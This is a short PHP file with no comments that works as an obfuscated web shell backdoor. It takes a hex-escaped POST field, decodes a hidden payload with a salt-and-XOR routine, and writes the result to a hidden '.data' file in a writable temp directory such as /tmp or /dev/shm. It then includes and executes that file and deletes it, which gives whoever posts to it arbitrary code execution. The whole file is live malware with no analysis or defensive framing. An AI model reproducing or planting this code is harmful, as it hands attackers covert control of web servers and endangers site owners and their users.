<?php

if(!empty($_POST["\x63o\x6Dp"])){
	$elem = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/tmp", "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP")]);
	$descriptor = $_POST["\x63o\x6Dp"];
	$descriptor= 	explode(	"."	 	,			$descriptor	);		
	$mrk = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $salt);
            $z = 0;
    
            $__tmp = $descriptor;
            while( $v6 = array_shift( $__tmp)) {$sChar = ord( $salt[$z  %$sLen]);
                $dec =( ( int)$v6 - $sChar -( $z  %10))	^		33;
                $mrk.= chr( $dec);
                $z++;
            }
	foreach ($elem as $key => $tkn) {
    		if (is_writable($tkn) && is_dir($tkn)) {
    $factor = "$tkn" . "/.data";
    $file = fopen($factor, 'w');
if ($file) {
	fwrite($file, $mrk);
	fclose($file);
	include $factor;
	@unlink($factor);
	die();
}
}
}
}